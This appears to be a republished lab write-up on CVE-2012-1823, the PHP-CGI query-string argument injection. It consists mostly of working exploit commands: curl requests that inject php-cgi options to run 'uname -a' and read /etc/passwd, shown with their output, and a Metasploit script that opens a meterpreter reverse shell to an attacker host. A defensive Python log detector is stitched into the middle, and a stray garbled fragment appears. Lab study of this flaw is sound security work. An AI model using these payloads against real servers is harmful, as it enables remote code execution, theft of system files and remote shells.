Studying CVE-2012-1823

Source: Internet  Published by: 中标麒麟软件大全  Editor: 程序博客网  Time: 2024/05/05 14:56

References:
https://pentesterlab.com/exercises/cve-2012-1823/course
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/

user@debian:~$ php-cgi -h
Usage: php [-q] [-h] [-s] [-v] [-i] [-f <file>]
       php <file> [args...]
  -a               Run interactively
  -b <address:port>|<port> Bind Path for external FASTCGI Server mode
  -C               Do not chdir to the script's directory
  -c <path>|<file> Look for php.ini file in this directory
  -n               No php.ini file will be used
  -d foo[=bar]     Define INI entry foo with value 'bar'
  -e               Generate extended information for debugger/profiler
  -f <file>        Parse <file>.  Implies `-q'
  -h               This help
  -i               PHP information
  -l               Syntax check only (lint)
  -m               Show compiled in modules
  -q               Quiet-mode.  Suppress HTTP Header output.
  -s               Display colour syntax highlighted source.
  -v               Version number
  -w               Display source with stripped comments and whitespace.
  -z <file>        Load Zend extension <file>.
  -T <count>       Measure execution time of script repeated <count> times.

So we try http://192.168.170.133/index.php?-s or http://192.168.170.133/?-s, and can view the source code of index.php.

将『

➜  ~  curl "http://192.168.170.133/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input" --data "<?php system('uname -a');die(); ?>"
Linux debian 2.6.32-5-amd64 #1 SMP Thu Mar 22 17:26:33 UTC 2012 x86_64 GNU/Linux
➜  ~  curl "http://192.168.170.133/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input" --data "<?php system('cat /etc/passwd');die(); ?>"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
...
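A log-side check for the mechanism shown above, added here as an example (it is not from the original post or from PentesterLab): it mirrors the CGI rule that a query string containing no literal "=" is split on "+", URL-decoded and handed to php-cgi as argv, and flags requests whose decoded argv contains an option-like token. The access-log lines are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache combined format), not taken from the page.
SAMPLE_LOG = """\
192.168.170.132 - - [05/May/2024:14:56:01 +0000] "GET /index.php?-s HTTP/1.1" 200 512 "-" "curl/7.68.0"
192.168.170.132 - - [05/May/2024:14:56:02 +0000] "POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 98 "-" "curl/7.68.0"
10.0.0.5 - - [05/May/2024:14:56:03 +0000] "GET /index.php?page=-s HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.6 - - [05/May/2024:14:56:04 +0000] "GET /search?q=php-cgi HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.7 - - [05/May/2024:14:56:05 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def cgi_argv_from_query(raw_query: str):
    """Mirror the CGI rule the vulnerable php-cgi relied on: a query string
    with no literal '=' is split on '+' and each word is URL-decoded and
    passed as argv. Returns that argv list, or None when no argv is produced
    (empty query, or a query with '=' such as ?page=-s)."""
    if raw_query == "" or "=" in raw_query:
        return None
    return [unquote(tok) for tok in raw_query.split("+")]


def is_php_cgi_injection(target: str) -> bool:
    """True when the request target would deliver option-like argv to php-cgi.
    Note that %3d does not count as '=' here, exactly as in the vulnerable path."""
    _, _, raw_query = target.partition("?")
    argv = cgi_argv_from_query(raw_query)
    return argv is not None and any(tok.startswith("-") for tok in argv)


def flag_suspicious(log_text: str):
    """Return the request targets in log_text that match the injection pattern."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and is_php_cgi_injection(m.group("target")):
            hits.append(m.group("target"))
    return hits


if __name__ == "__main__":
    for target in flag_suspicious(SAMPLE_LOG):
        print("suspicious php-cgi argv:", target)
```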

Exploiting with Metasploit

# php-cgi.msf
use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.170.133
set RPORT 80
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.170.132
exploit